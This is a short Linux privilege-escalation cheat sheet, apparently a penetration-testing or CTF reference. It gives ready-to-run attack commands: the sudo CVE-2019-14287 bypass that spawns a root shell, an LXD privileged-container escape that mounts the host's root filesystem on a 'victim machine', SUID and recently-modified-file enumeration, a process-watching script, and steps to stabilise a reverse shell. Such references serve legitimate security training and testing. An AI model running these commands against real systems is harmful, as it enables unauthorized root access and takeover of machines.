Privileges Escalation - Linux

Table of content

• Sudo
  • CVE-2019-14287
• Backup
• Groups
  • LXC/LXD
• SUID
• Last modified files
• Monitor new process
• Fix the shell

Sudo

CVE-2019-14287

sudo -l
# (ALL, !root) /bin/bash

Use CVE-2019-14287 :

sudo -u#-1 /bin/bash

Backup

find / -name *backup* 2> /dev/null

Groups

LXC/LXD

Build an Alpine image and start it using the flag security.privileged=true, forcing the container to interact as root with the host filesystem.

# Can be done on the attack machine
# build a simple alpine image
git clone https://github.com/saghul/lxd-alpine-builder
cd lxd-alpine-builder
sed -i 's,yaml_path="latest-stable/releases/$apk_arch/latest-releases.yaml",yaml_path="v3.8/releases/$apk_arch/latest-releases.yaml",' build-alpine
sudo ./build-alpine -a i686

# Import the created tgz on the target machine

# On the target machine
# Import the image
# It's important doing this from YOUR HOME directory on the victim machine, or it might fail.
lxc image import ./alpine*.tar.gz --alias myimage 

# Before running the image, start and configure the lxd storage pool as default 
# You can set default value everywhere
lxd init

# Run the image
lxc init myimage mycontainer -c security.privileged=true

# Mount the /root into the image
lxc config device add mycontainer mydevice disk source=/ path=/mnt/root recursive=true

# Interact with the container
lxc start mycontainer
lxc exec mycontainer /bin/sh

SUID

find / -type f -user root -perm /u+s -ls 2>/dev/null
find / -user root -perm -4000 -print 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000 -exec ls -ldb {} \;

Last modified files

find /etc -type f -printf '%TY-%Tm-%Td %TT %p\n' | sort -r
find /home -type f -mmin -60
find / -type f -mtime -2

Monitor new process

PSPY does the job but the following script can be usefull

#!/bin/bash

# Loop by line
IFS=$'\n'

old_process=$(ps aux --forest | grep -v "ps aux --forest" | grep -v "sleep 1" | grep -v $0)

while true; do
  new_process=$(ps aux --forest | grep -v "ps aux --forest" | grep -v "sleep 1" | grep -v $0)
  diff <(echo "$old_process") <(echo "$new_process") | grep [\<\>]
  sleep 1
  old_process=$new_process
done

Fix the shell

# Upgrade the shell
python -c 'import pty; pty.spawn("/bin/bash")'
# CTRL+Z

# In Kali 
# Keep the number of rows and cols
stty -a  
stty raw -echo
fg

# In reverse shell
stty rows ${num} columns ${cols}
reset
export SHELL=bash
export TERM=xterm-256color